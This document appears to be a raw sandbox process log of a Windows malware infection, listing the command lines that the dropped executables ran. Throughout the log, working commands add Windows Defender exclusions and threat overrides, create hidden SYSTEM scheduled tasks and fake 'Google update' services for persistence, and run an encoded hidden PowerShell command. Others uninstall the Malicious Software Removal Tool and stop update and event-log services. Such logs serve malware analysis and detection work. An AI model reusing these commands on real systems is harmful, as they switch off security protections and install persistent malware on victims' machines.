"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Users\Admin\Pictures\yW21xyCVFtL5vbbMh8vSUV77.exe

"C:\Users\Admin\Pictures\yW21xyCVFtL5vbbMh8vSUV77.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Users\Admin\AppData\Local\Temp\7zS3830.tmp\Install.exe

.\Install.exe /tEdidDDf "385118" /S

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\qEyOWBL.exe\" it /CMsdidNczE 385118 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe\" it /PdldidFsHw 385118 /S" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\9C20.bat" "

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

C:\Windows\system32\taskeng.exe

taskeng.exe {A0C7BAAC-E03D-419F-BDCD-85EABDCF3FBD} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\C1BA.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe

C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe it /PdldidFsHw 385118 /S

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240514010344.log C:\Windows\Logs\CBS\CbsPersist_20240514010344.cab

C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe

C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe it /PdldidFsHw 385118 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe

"C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe

"C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe"

C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe

"C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe

"C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "WSNKISKT"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"

C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe

"C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gBaxREWWY" /SC once /ST 00:14:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gBaxREWWY"

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "WSNKISKT"

C:\ProgramData\wikombernizc\reakuqnanrkn.exe

C:\ProgramData\wikombernizc\reakuqnanrkn.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

